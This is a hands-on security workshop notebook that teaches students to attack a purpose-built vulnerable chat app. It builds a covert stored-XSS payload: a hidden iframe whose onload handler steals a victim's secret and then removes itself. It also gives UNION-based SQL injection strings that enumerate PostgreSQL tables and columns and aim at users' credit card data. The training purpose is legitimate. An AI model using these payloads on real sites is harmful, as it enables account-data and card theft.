# Introduction
Hello! Today we're going to hack a website.
Here's a rough outline:
- How do I use this environment?
- How do computer systems get attacked?
- The target
- Attack 1: Client-side code injection
- Attack 2: Server-side code injection
- Wrap-up

# How do I use this environment?
Welcome to your very own 'Jupyter notebook'!

A Jupyter notebook is a web environment for mixing pieces of code and text. It's made up of cells. Each cell either contains 'markdown' (text written with extra markings to add headings, boldness, images, etc.) or 'python' code by default. For example this is currently a markdown cell. Code cells can also have 'HTML' or 'JavaScript' in them. Don't worry if you don't know much about 'python'. You won't actually have to write any. Don't worry if you don't know much about 'HTML' or 'JavaScript'. We'll only use it a little and teach you what you need!

If you double click on a cell you can edit its contents. When you double click on this cell you'll see the markdown written to render this text.

When you're inside a markdown cell editing it, you can press **Shift + Enter** to render the markdown into pretty looking text. If you're inside a code cell you can press **Shift + Enter** to run the code.

We'll put a python cell below. Try editing it to include your name where it currently says `yourname` then pressing **Shift + Enter** to run it.

In [3]:
my_name = "yourname"
print("Hello "+my_name+"!")

Hello yourname!


You'll mostly just need to run cells for this workshop. No need to create new ones or delete them. You can re-run cells as many times as you like. The Jupyter environment will maintain a global state that continues in the background between all your cells. Try running the cells below in different orders to change what's printed.

In [4]:
most_recently_run = "upper cell"

In [5]:
most_recently_run = "lower cell"

In [6]:
print("You most recently ran the " + most_recently_run)

You most recently ran the lower cell


# How do computer systems get attacked?
To defend systems, the big question to answer is:
- **How** might someone conduct an attack?

Understanding the **how** of a threat is crucial to defending against it. For example, in the physical world we might know that thieves can get into houses by looking for and finding hidden spare keys. Since we know the **how** of the threat we can mitigate against it by putting our spare key in a lockbox.

So how do computer systems get attacked? Unfortunately there's no one straightforward answer. There are many different kinds of systems that get attacked in many different ways. In fact, sometimes it's not clear where legitimate, if somewhat creative, usage of a system ends and 'hacking' begins. Nonetheless cyber attacks almost always have the property that they **use a system in a way the creator or owner did not intend and has not authorised** and usually this is done **by finding a flaw, or *vulnerability*, in a system which leads to unexpected behaviour and using it creatively, or *exploiting it* with an *exploit***.

**Note:** *The word hacking has a few different meanings apart from the cyber attack meaning. For example you can 'hack away' at some code, meaning just writing and tweaking some computer code (legitimately) to get it to work. It's usually clear from context what people mean.*

One common kind of flaw is when a system that takes user input **inadvertently allows the user input to be interpreted by the machine as additional software instructions**.

This is a little like if at a fancy restaurant when you were given the bill, rather than just putting your card next to it, you removed the bill and put in your own copy of the bill on which everything was cheaper. The system (the waiter) expects your input to be valid (a credit card) but when you're somewhat creative you change the system's (the waiter's) code (bill), so it behaves in a way (charges you less) that it's developer (manager) doesn't intend or authorise.

The mistake that makes this possible is unintentional on the part of the application developer (the manager didn't think to tell the waiter to check the restaurant patron hadn't swapped the bill), but abusing that mistake to achieve nefarious ends is most certaintly intentional on the part of the attacker (you definitely meant to swap out the bill to pay less!).

This might be a little confusing or vague at this point. Don't worry! We're going to explore this idea better in not one but two hands-on attacks. That is, we're going to hack a website. Twice. 

But I hear you ask, aren't we the good guys? Indeed we are. But it's not that unusual for the good guys to do some hacking **of their own systems**. Defenders will attack their own websites/software/networks, or bring in teams of friendly attackers to do it, in order to understand the potential vulnerabilities *before* a real malicious attacker exploits them.

And thus, for the rest of the workshop we're going to put ourselves in the shoes of would-be attackers.

# The Target

**Note:** *Consider any data you enter into the target public! It's going to be attacked I'm afraid!*

Today we'll be hacking a simple chat app called 'BeeSecure'. Head to http://bee-secure.herokuapp.com and sign up for an account. Make sure you put in a 'secret' that you're happy for potential hackers to find! Explore the features of the website and start chatting with your classmates.

Once you're comfortable with the website we'll start hacking!

We'll investigate two attacks:
1. Client-Side Code Injection (a 'cross-site scripting' attack)
2. Server-Side Code Injection (an 'SQL injection' attack)

# Very Important Note

The techniques we'll be teaching you today may be a **crime** if directed against a system you're not authorised to attempt them on. **DO NOT** use these techniques, or any other hacking techniques, on systems you are not **explicitly authorised** to use them on.

To be *really clear*, once again: using these techniques on systems you don't have permission to try them on may be a **crime**.

People have been known to accidentally cross the line from legal to illegal inadvertanetly with just a few button clicks. **DO NOT** look for the line. **DO NOT** push the boundaries.

**DO NOT** use these techniques on websites or systems you are not **explicitly authorised** to use them on.

With that (hopefully very sobering) warning (filled with gravitas), let's look at the first attack!

# Attack 1: Client-Side Code Injection

When you go to a website two computers are involved:
- Yours: A **Client**
- The Website's: The **Server**

But it's usually not just you who accesses a particular website. Other people do: other clients. In fact data you enter into the website is shown on other people's computers after going through the server. For BeeSecure it's your messages that show up on other people's computers. Can we trick other people's computers, that is other clients, into reading our messages to them as code?

This kind of attack might be called a 'Client-Side Code Injection' attack since we're injecting code (via the website server) into other clients. It's also often called a '[Cross-Site Scripting](https://www.cloudflare.com/en-gb/learning/security/threats/cross-site-scripting/)' (shortened to XSS when written) attack.

To do this we need to understand what 'code' even looks like in our context. 

## Background and Basics 

### HTML

Without closing this notebook, open up the target website, sign in, send a couple of chat messages, then right click anywhere, and select 'View Source' or 'View Page Source' in the drop down menu. If you can't see the right button to click ask for help. What you're seeing is **H**yper **T**ext **M**arkup **L**anguage or (HTML).

**Excercise**
- Can you see anything in the HTML that matches the rendered webpage you saw before?
  - Can you see any bits of text that look familiar?

Lots of HTML is just the text that appears on the webpage with added aesthetic (like colours, fonts, images etc.) and functional (links, search bars etc.) elements you normally see or interact with described in code (or perhaps more precisely in 'markup').

If you take a look through you might notice HTML 'tags' of the form:
```
<name-of-tag>
Some stuff inside the tag
</name-of-tag>
```
Everything in HTML is inside a 'tag'. These tags change how what's 'inside' of them looks and behaves. There are tags to create tables, forms, images, videos, sound, and more. Tagged pieces of HTML begin with `<name-of-the-tag>` then contain contents (which often involves other tags!) then the end tag `</name-of-the-tag>`.

One simple kind of tag is the 'heading' tag. Starting from `h1` going down to `h6` these tags change the text inside to look like a heading. Look at the HTML code below, then run the cell to see it render.

In [54]:
%%html
<h1>Heading One</h1>
<h2>Heading Two</h2>
<h3>Heading Three</h3>
<h4>Heading Four</h4>
<h5>Heading Five</h5>
<h6>Heading Six</h6>
Normal Text

Exactly what different size headings look like varies from website to website. Check out [**C**ascading **S**tyle **S**heets](https://developer.mozilla.org/en-US/docs/Learn/CSS/First_steps/What_is_CSS) (often shortened to CSS) if you're interested!

There are some tags, like image tags, in which having content or text inside doesn't really make sense. An image is an image. These tags will be a standalone tag. For example:
```
<img src="http://url.com/image.png" width=100 height=100 />
```
You still have the `<>` brackets and the tag name `img`, but there's just one set that ends with `/>` instead of just `>`. That is there's no `<img ..> </img>`, just a single `<img .. />`. Inside the tag is given **attributes** that control its behaviour. In this example an image tag needs to know where to go to get the image. It can optionally be given a width and/or height too to control its size.

These attributes aren't just for image tags or tags without any contents. Almost all tags have attributes that can be set to do interesting things.
 
Run the cell below to render an example image tag:

In [55]:
%%html
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/85/Smiley.svg/1200px-Smiley.svg.png" width=100 height=100/>

This is all good and well, but what does HTML have to do with attacking BeeSecure?

Plenty.

When you clicked 'view source' earlier, the HTML you were shown was the original handed to your computer by the server. When the page first loads it has no messages. When you send or receive messages the rendered webpage *changes* to include them. This means the version of the HTML stored in your web browser's memory changes from the original sent to it initially by the server. This version of the webpage's current state is called the **D**ocument **O**bject **M**odel or **DOM** for short. The DOM is *changing* in repsonse to *another user's* message.

But of course this means *your messages* are *changing* the DOM of *other user's* browsers that you're chatting with.

The DOM which contains HTML.

Most of your messages have just been text that ends up inside some container HTML inside the DOM. But HTML is not so different from text. Perhaps the creators of BeeSecure haven't been careful? Can we get some arbitrary HTML added to the DOM?

**Excercise**
- What happens if you include some opening and closing HTML tags with content inside in a message? Try `<h1>Some text here</h1>`. What happens?
- Can you find a (G-rated) image online and send it to the group with an `img` tag?
- *Bonus*: Can you figure out how to [Rickroll](https://en.wikipedia.org/wiki/Rickrolling) everyone in the chat? You can either use a link or try and get the video to display directly with a `video` tag.

Great! We can send more complex messages than the creators of the site intended. Making super cool messages to send to my friends is fun, but can do I anything more powerful?

The answer is a definite **yes**. To do that, we need to learn about JavaScript.

### JavaScript
If HTML describe what's on a webpage, and CSS describes how it looks, **JavaScript describes how it behaves**. Modern websites do all sorts of clever things, from sorting lists of products on the fly, to running full blown games. These kinds of applications require webpages to *do things*. They need to run code locally on the client. JavaScript is the coding language that modern webbrowsers can all run. Within JavaScript we can communicate with servers on the internet, accept user input, and crucially **read or modify the DOM** (remember this is the web-browser's internal model of the website) as we go.

Below we ask Jupyter notebook to run a very simple line of JavaScript on this webpage which calls the built-in `alert` function. Run it and see what happens!

In [56]:
%%js

alert("This is a dialog box!");

<IPython.core.display.Javascript object>

To include javascript inside of HTML we can use a script tag:

In [57]:
%%html

<script>alert("This is (still) a dialog box!");</script>

So in theory since we can make other client web browsers (i.e. our classmates' web browsers!) interpret arbitrary HTML, we should be able to use `<script>` tags to run arbitrary JavaScript right?

**Excercise**
- Send a script tag with an alert in it in the chat. Did it work?

Unfortunately it seems that sending a script tag doesn't work! This is often the case when we're exploiting a vulnerability. Because we're using a system in an unexpected way there'll be different quirks and obstacles that pop-up. Part of being a good vulnerability researcher/exploit developer is being able to cope with this and keep going. So let's do that.

We might hypothesise that if script tags don't work, maybe it's because when they get added to the DOM they're not 
automatically run?

Perhaps script tags need to be sent in the initial HTML to be run?

We're not certain if this is right or not and that's ok. It's a hypothesis after all. We could investigate this further if we needed or wanted to, but for the moment we're going to continue trying to develop our exploit based on this hypothesis. So we need to find another way to run JavaScript from HTML that doesn't involve `script` tags. Thankfully we've found one ahead of time for you.

### HTML Event Attributes

Often webpages do things in response to **events**. The user clicks a button, a form is submitted, or a particular part of the webpage has experienced an error. These events can have pieces of JavaScript code attached which the browser will run when the relevant events occur. Attaching code to events can happen from within JavaScript, or *from within the HTML itself* by using **HTML Event Attributes**.

We talked about attributes of HTML tags earlier. If you remember our image example we had `src`, `width`, and `height` attributes:
```
<img src="http://url.com/image.png" width=100 height=100 />
```
Event attributes are very similar except rather than having a URL or a number as their argument, they take a string of JavaScript code to execute when the relevant event occurs.

There's a list of event attributes [here](https://www.w3schools.com/tags/ref_eventattributes.asp). One that seems particularly useful is `onload` which on certain tags will run after the content of the tag is loaded. That's handy because surely tags need to be loaded to be rendered, and the tags we're sending in our messages are definitely being rendered. 

But which tag shall we use? To save you time we've experimented and figured out a good tag to use is the `iframe` tag. The `iframe` tag is normally used to put a small version of another webpage inside your own with its URL provided in the `src` attribute. For example:

In [58]:
%%html

<iframe src="http://en.wikipedia.org">

We've just put a small version of Wikipedia inside our Jupyter notebook! Ok, so we look to be just about ready to inject some JavaScript code to run on other client machines. Let's do that below.

## Creating  a POC
Now we can create a basic **P**roof-**O**f-**C**oncept (POC) using the HTML event attributes on an `iframe`.

**Excercise**
- Try and send a `iframe` start and end tag in the chat with no content inside, and use the `onload` attribute to create an alert box on everyone else's machine (look up earlier in this notebook to see how to do this). If you get stuck, ask one of your instructors for a tip!
  - **A quick gotcha**, if you use `"` in HTML to contain your code string, then you can't use `"` *inside* the string itself. Whenever you would would have used a `"` in your JavaScript, try using a `'` instead. Having to avoid using particular characters is very common in exploit development. 

Scroll down when you're done with the excercise to see the solution and move on to the next step...
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    

...and we continue!

Hopefully you should've have something that looked a little like what's shown below.

In [59]:
%%html

<iframe onload="alert('Haha your machine is mine!');" src="http://en.wikipedia.org"></iframe>

## Exploit Development

We've caused some chaos and demonstrated we can run JavaScript code on other client machines. Can we go beyond our POC? Can we do something a little more clever for our 'actual' attack? Let's workshop our exploit *payload* inside of Jupyter to improve it before returning to the chat app later.

The pace will pick up a little bit at this point. Don't worry if you don't quite grasp all the details. If you've understood to this point you've gotten the core ideas of the attack. We have to move fast without very careful or detailed explanations to see the full attack in our short session! Feel free to ask questions :)

### Being sneakier

Let's make our attack a little more covert and harder to spot.

At the moment users see a piece of Wikipedia or another website appear when we send our attack. That's more than a little suspicious.

We can use the `style` attribute to add some of that CSS we mentioned earlier to make the `iframe` invisible. We'll just make the size of the `iframe` zero and make the border of size zero as well. We can also put in some non-suspicious text, since an empty message is also a little suspicious. 

In [60]:
%%html

<iframe onload="alert('Haha your machine is mine!');" style="width:0;height:0;border:0;" src="http://en.wikipedia.org"></iframe>Hello friends!

Let's make or exploit even sneakier. Let's have the `iframe` delete itself once it's done. This has two advantages:
1. It means our malicious code will only run once. Currently every time the `iframe` is reloaded in the DOM, its `onload` event triggers and our code will re-run. You've probably the noticed the mess this is causing in the chat app. We want our attack to be more controlled and selective. If the `iframe` deletes itself from the DOM after its first run, even when the DOM reloads our code won't be run again.
2. It means there's less evidence of our attack that might allow it to be identified or inspected. Currently our `iframe`, whilst invisible to an everyday user, is sitting in the DOM which is not hard to 'Inspect' in most modern web browsers if you know what you're doing. Let's scrap (some of) the evidence!

To delete the `iframe` we need to modify the DOM from our JavaScript code. Thankfully JavaScript is designed with modifying the DOM as one its primary purposes. We can give our `iframe` an **`id` attribute** equal to a simple string. We'll use `myexploitid` but pick something unique when you conduct the attack. This can then be used in our code to get a handle to it in the DOM. We store this handle in a variable we call `thisFrame`:
```javascript
var thisFrame = document.getElementById('myexploitid');
```
Then we can delete the DOM element stored in `thisFrame` it with the following snippet:
```javascript
thisFrame.parentNode.removeChild(thisFrame);
```

Putting this together we get (we've moved things on to different lines to make everything easier to see):

In [61]:
%%html

<iframe
id="myexploitid"
style="width:0;height:0;border:0;"
src="http://en.wikipedia.org"
onload="
    alert('Haha your machine is mine!');
    var thisFrame = document.getElementById('myexploitid');
    thisFrame.parentNode.removeChild(thisFrame);
"
>
</iframe>
Hello friends!

This won't look very different but it will behave more reliably and leave less evidence to find!

*Bonus*: When we say less evidence, we mean in the DOM. If you right click and select 'Inspect' or 'Inspect Element' to see the DOM you'll notice there's no `iframe` there on this latest example inside our Jupyter notebook. Just the text. This is unlike our earlier examples, if you use 'Inspect' on them you'll see left a suspicious looking `iframe` with our even more suspicious looking malicious JavaScript.

Perfect, now our malicious message looks just like any other. But ours will run whatever JavaScript code we'd like to run on all the client machines that connect to the website. 

### Scrapping Deadweight

Our next change is a very minor one. You might notice a brief delay for our pop-up to appear. That's because the `iframe` has to load Wikipedia first. We don't actually need Wikipedia, in fact it's slowing us down and leaving more evidence. Let's just scrap the `src` attribute and see if things work faster.

*Bonus*: Leaving in `src` adds more evidence because an attentive user looking through the 'Inspect' tabs will spot a network connection out to Wikipedia. This is obviously suspicious behaviour when you're on a chat app that has nothing to do with Wikipedia. 

In [62]:
%%html

<iframe
id="myexploitid"
style="width:0;height:0;border:0;"
onload="
    alert('Haha your machine is mine!');
    var thisFrame = document.getElementById('myexploitid');
    thisFrame.parentNode.removeChild(thisFrame);
"
>
</iframe>
Hello friends!

That's worked well!

#### The pointy end
Ok so we now have an invisible HTML element that will quickly run whatever JavaScript we like then delete itself. What can we do with this? What will the pointy end of our attack be? Steal people's secrets of course!

We've done the rest of the work for you. The below snippet will check the username in the DOM of the client it's running on, see if it's the chosen target, and if it is, retrieve their secret from the DOM and send it out as a message.  
```javascript
var target = 'VictimsUsername';
var username = document.getElementById('username').textContent;
if (username == target) {
  var secret = document.getElementById('secret').textContent;
  socket.emit('message',{msg:secret});
}
```
*Bonus*: To do this we had to reverse engineer the webpage somewhat. If you're looking for a challenge identify which parts of the webpage in the DOM we're using to get the information we wanted. We also had to figure out how messages get sent to the chat and retrofit that for our own purposes. How did we figure out how to send a message to the chat from JavaScript based on the original website?

#### Putting it all together!

This will no longer work in the Jupyter notebook because it depends on the details of BeeSecure. The complete attack is shown below. Select a victim, put their username into the `target` variable instead of the current placeholder, make sure you change `myexploitid` to a custom value (In both places! It appears twice!), choose your own non-suspicious message, and launch your attack to have your victim's secret sent to everyone in the chat.
```HTML
<iframe
id="myexploitid"
style="width:0;height:0;border:0;"
onload="
    var target = 'VictimsUsername';
    var username = document.getElementById('username').textContent;
    if (username == target) {
      var secret = document.getElementById('secret').textContent;
      socket.emit('message',{msg:secret});
    };
    var thisFrame = document.getElementById('myexploitid');
    thisFrame.parentNode.removeChild(thisFrame);
"
>
</iframe>
My non-suspicious message here..
```

## Summary
We've:
- Seen the basics of HTML, JavaScript, HTML Event Attributes, and the Document Object Model (or DOM)
- Identified a vulnerability where our input to the server is not carefully checked and allows us to modify the DOM of other clients in dangerous ways
- Developed a Proof-Of-Concept, or POC, turning our DOM modification into an ability to run arbitrary code in JavaScript
- Developed an exploit based off our POC that covertly(ish) and in a targeted way steals secrets from a chosen victim.

# Attack 2: Server-Side Code Injection

Ok so we've been able to send messages to other **client** machines and execute JavaScript. This lets us do lots of interesting nefarious things. Can we do something similar for the **server**? 

It might seem a little odd, but to answer this question we need to understand what a **database** is, in particular what **SQL** is, and how they both tend to be used.

## Databases

Websites do all sorts of different things. There are websites for sharing videos, checking your bank account, booking flights, and much more. But one thing that is common among many different websites is their ability to *manage information*. Whether that be video files, bank balances, or flight schedules, websites almost always have the functionality to *create* (or add) information, later *read* or *update* that information, and finally *delete* it. Different pieces of information may also have all sorts of links between them that a website manages. For example an airline website contains both user account details and flight schedule details, but then connects to two together to store lists of bookings.

*Bonus:* If you're interested, later checkout the acronym [CRUD](https://en.wikipedia.org/wiki/Create,_read,_update_and_delete).

Rather than re-inventing the wheel everytime someone creates a website, this functionality is provided for websites by other dedicated pieces of software: websites are built on top of **databases**.

When our client accesses a website often the server will use our input to *query* the database and add/retrieve/update/remove information as needed based on what we've requested the website to do.

Maybe you can see where this is going. Maybe you can't just yet.

Either way we need to learn more about these *queries* that webservers send to databases. In particular the language they're written in.

## SQL
Whilst there are many different kinds of databases that a website can use, many of them share a common language 
called **S**tructured **Q**uery **L**anguage.

Let's look at a quick example. Suppose our website allows users to login. The database needs to store this. So we might have a *table* of users. When we talk about database tables we're talking about abstract datastructures, but the term is inspired by written tables you might see in books or reports. Just like written tables they have *columns* and *rows*. Each column can hold a particular kind of information, and a row contains a set of entries under each column for one record. For example suppose a table called `users` in a database might look something like this if it was written out:

|id (number)| username (string) | password (string)|
|--------------|-----------|------------|
|0|john|john_is_cool|
|1|jane|jane_is_rad|

The `users` table has three columns, `id`, `username`, and `password`. They each have a type, `number`, `string`, and `string` respectively. We can see the table has two entries, or rows, each one representing a user.

SQL `SELECT` queries allow us to get data from tables. We can choose which columns we want from which table. For example if we wanted all of the `username` values from the `users` table we could write the SQL query:
```SQL
SELECT username FROM users
```
This would return `john` and `jane`. We could ask for both `username` and `password`:
```SQL
SELECT username, password FROM users
```
Which would return two pairs, `('john','john_is_cool')` as well as `('jane','jane_is_rad')`. We can also restrict which rows we're interested in with conditions by adding a `WHERE <condition>` on the end. For example if we only wanted `john`'s password:
```SQL
SELECT password FROM users WHERE username == 'john'
```

Which would return `john_is_cool`.

**Excercise**
- Can you write an SQL query which finds the id and username of a user with the password 'flying_saucer'?

This is just the very crude basics of SQL. SQL is a very mature and powerful technology with lots of advanced features.

It might not quite seem like it, but in the same way we talked about HTML and JavaScript being code on the client side, SQL is a special form of code that gets executed on the server side (along with many others!).

To achieve server side code injection, can we try and trick the server into reading our input as SQL? Enter SQL injection.

## SQL Injection
As we've talked about earlier, a good way to exploit a sytstem is to try and trick it into reading your input as a user as code. This is often possible with SQL code if the programmer of the website hasn't been careful. Consider our example from above. To login to the website the server might need to check a password and so run a query like:
```SQL
SELECT password FROM users WHERE username == 'john'
```
But it needs to be able to run this with whatever username we provide, so what we enter in a text entry box on the login screen might end up inside the query:
```SQL
SELECT password FROM users WHERE username == '<user_entry>'
```

What if the username was `geoff`? 
```SQL
SELECT password FROM users WHERE username == 'geoff'
```

Ok, what if I enter the username `nonsenicalUsername' UNION SELECT 'ChosenString`. I end up with the SQL query:
```SQL
SELECT password FROM users WHERE username == 'nonsenicalUsername' UNION SELECT 'ChosenString'
```

The `UNION` allows the results of two SQL queries to be combined into one longer list of results. The first query looks for a password for a user called `'nonsenicalUsername'` and so returns nothing. The second query uses `SELECT` to return a constant value, not from the database. So it returns `'ChosenString'`. Do you see what's happened? We've used `'` in our user input. Since the website just put our string in without checking it carefully, we were able to break out of the original `username ==` spot and start putting in arbitrary SQL. So we've changed this query from one that looks for the password of a user to one that returns a string of our choice.

This is called **SQL Injection**.

Using the `badInput' UNION SELECT 'Injection success!` pattern can help us find SQL injection spots. If we put it into inputs we think are placed into SQL queries, then it should cause them to return `Injection success!` rather than what was intended.

## Finding a Vulnerability
Let's try this out on BeeSecure. We need to find a place where we think our input might be put into an SQL query **and** the results of our input are visible to us as a user.

**Excercise**
- Can you use the `badInput' UNION SELECT 'ChosenInput` pattern to find a text input box on BeeSecure that has an SQL injection vulnerability?

Scroll down when you're done with the excercise to see the solution and move on to the next step...
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    


Hopefully you've figured out that the 'Bio Search' search bar is vulnerable to SQL injection. Great news! We should be able to use this to run SQL queries over the database and have the results returned to us inside the 'Bio Search' results.

What will we do with this? What advantage does it offer us over our original client-side attack? There's two opportunities here:
1. We could use this to steal people's secrets more quietly, perhaps? Rather than having their secret sent as a message to the whole chat, it will only be visible to us in the 'Bio Search' results.
2. We could steal secrets we couldn't with the server attack. Do you remember entering your credit card details earlier? Those aren't in the DOM so a client-side attack couldn't get them, maybe this will work?

We'll chase up the second lead, and try steal credit card details, although both attacks would be very similar. Now to get the data we want, we'll need to craft an SQL query to inject. To craft an SQL query, we need to know more about how the database is structured. We need to **enumerate** the database.

## Enumerating the Database
To get the information we want out of the database we need to understand what data is available. We need to identify the **schema** of the database. That is what tables exist and what columns does each table have. Let's first try and figure out what tables are in our database.

This can be tricky in general but we'll give you a hand. We're using a database called 'PostgreSQL' version 12.12. This kind of database has a *built-in* table called `pg_tables` which contains a list of all the tables in the database. The `pg_tables` table has a column called `tablename` which sounds pretty useful! So to figure out what tables exist in the database, we need to try and run the SQL query:
```SQL
SELECT tablename FROM pg_tables
```

Remember though, we're SQL injecting so we have to be a little cleverer. The SQL query we're injecting into probably looks something like this:
```SQL
SELECT ??? FROM ??? WHERE ??? = '<We-Inject-In-Here>'
```

If we enter `randomJunk' UNION SELECT tablename FROM pg_tables` we end up with the query:
```SQL
SELECT ??? FROM ??? WHERE ??? = 'randomJunk' UNION SELECT tablename FROM pg_tables'
```

This is almost right, but notice that pesky `'` on the end! Earlier our `' UNION SELECT 'ChosenString` worked because the final `'` ends the string `'ChosenString'`. Having a `'` dangling will break our query. Perhaps we can just put a `UNION SELECT 'ExtraResult` on the end? So we'll inject in `randomJunk' UNION SELECT tablename FROM pg_tables UNION SELECT 'ExtraResult`. This means the server will probably end up a query that looks something like:
```SQL
SELECT ??? FROM ??? WHERE ??? = 'randomJunk' UNION SELECT tablename FROM pg_tables UNION SELECT 'ExtraResult'
```
That looks promising!

**Excercise**
- Can you use our SQL injection vulnerability to list the tables in the database?
- Can you see the `ExtraResult` listing we added in with our final `UNION SELECT 'ExtraResult`?
- Can you see a table that is likely to be interesting in our seach for user credit card data? 
  - **Tip**: there will be lots of tables whose names make no sense. Don't worry! I have no idea what most of them are either! When we're exploiting a complicated system we have to pick and choose what we dig into. If you don't understand what a table name means, at this stage it's probably not something relevant. 
  - **Hint:** we're looking for *user* credit card data.
  
Scroll down when you're done with the excercise to see the solution and move on to the next step...
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    

If you spotted the `users` table, well done! It is indeed what we want to look for. Now we need to know what columns the table has. We've gone and figured out some of the details of PostgreSQL for you to save time.

If we could just run an SQL query directly on the database to find the names of all columns of the `user` table it'd be:

```SQL
SELECT column_name FROM information_schema.columns WHERE table_name = 'users'
```

Of course we can't just run SQL queries. We have to inject them.

**Excercise**
- Use what you've learnt and seen to SQL inject the above query using the vulnerability in the 'Bio Search' bar and figure out which columns exist in the `users` table you identified earlier.

Scroll down when you're done with the excercise to see the solution and move on to the next step...
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    

One way to inject the query could've been to input:
```
randomJunk' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'users' UNION SELECT 'fakeColumn
```

This gives the list of columns:
```
bio
creditcard
fakeColumn
name
password
secret
username
```

Aha! In the `users` table there is a `creditcard` column.

**Excercise**
1. Write an SQL query that would return all the entries in the `creditcard` column of the `users` table
2. SQL inject this query

Scroll down when you're done with the excercise to see the solution and move on to the next step...
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
&ensp;    
